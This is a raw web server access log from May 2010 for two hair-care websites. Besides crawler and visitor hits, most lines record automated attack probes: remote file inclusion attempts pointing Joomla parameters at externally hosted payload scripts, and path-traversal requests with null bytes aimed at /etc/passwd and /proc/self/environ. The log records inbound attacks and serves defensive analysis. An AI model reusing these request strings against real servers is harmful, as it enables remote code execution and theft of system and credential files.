72.55.146.200 - - [31/May/2010:00:40:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:00:40:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:00:40:05 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:00:40:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:00:40:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:00:40:09 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
119.63.198.108 - - [31/May/2010:00:45:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12216 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
81.92.204.67 - - [31/May/2010:00:46:11 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:11 -0700] "GET /logs/access_100125.log%20%20//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:11 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /logs/access_100125.log%20%20//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:28 -0700] "GET /logs/access_100125.log%20%20//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:29 -0700] "GET /logs/access_100125.log%20%20//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:29 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:46:29 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:10 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:12 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:13 -0700] "GET /logs/access_100125.log//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:13 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:13 -0700] "GET /logs/access_100125.log//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:14 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:17 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:17 -0700] "GET /logs/access_100125.log//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:18 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:18 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:20 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:21 -0700] "GET /logs/access_100125.log//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:21 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:22 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:22 -0700] "GET /logs/access_100125.log//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:57 -0700] "GET /logs/access_100125.log%20%20//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:57 -0700] "GET /journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:47:57 -0700] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:00:50:07 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:00:50:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:00:50:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:00:50:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15176 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
68.10.208.161 - - [31/May/2010:00:52:07 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.freehairsecrets.com"
68.10.208.161 - - [31/May/2010:00:52:10 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.freehairsecrets.com"
81.92.204.67 - - [31/May/2010:00:52:39 -0700] "GET /logs///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 200 5663 "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:52:39 -0700] "GET //?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:52:39 -0700] "GET /logs/access_100125.log%20%20///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:53:21 -0700] "GET /logs/access_100125.log%20%20///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:53:21 -0700] "GET /logs///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 200 5663 "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:00:53:21 -0700] "GET //?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:00:56:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
204.68.97.131 - - [31/May/2010:01:01:50 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:01:02:57 -0700] "GET /logs/access_100125.log///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [31/May/2010:01:03:10 -0700] "GET /logs/access_100125.log///?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.218.116.134 - - [31/May/2010:01:04:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
200.43.180.250 - - [31/May/2010:01:08:51 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
200.43.180.250 - - [31/May/2010:01:08:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
200.43.180.250 - - [31/May/2010:01:08:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:11:39 -0700] "GET /index.php?option=com_user&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:01:17:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15219 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:01:21:54 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:01:21:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.226.12 - - [31/May/2010:01:21:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:24:17 -0700] "GET /logs/access_091026.log/index.php?option=com_user&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:24:17 -0700] "GET /index.php?option=com_user&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:24:17 -0700] "GET /logs/index.php?option=com_user&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.120.243.226 - - [31/May/2010:01:27:14 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.roadstoinnovation.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
77.88.25.28 - - [31/May/2010:01:28:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7604 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
203.19.4.18 - - [31/May/2010:01:32:59 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:37 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:38 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:39 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:40 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:41 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:42 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:43 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:44 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:45 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:47 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:48 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:49 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:50 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:51 -0700] "GET /index.php?option=com_fabrik&controller=../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:52 -0700] "GET /index.php?option=com_fabrik&controller=../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:33:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:02 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:03 -0700] "GET /logs/index.php?option=com_fabrik&controller=../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:04 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:05 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:06 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:08 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:09 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:10 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:11 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:13 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:14 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [31/May/2010:01:34:15 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /logs/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:01:38:05 -0700] "GET /logs/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:01:42:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12103 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
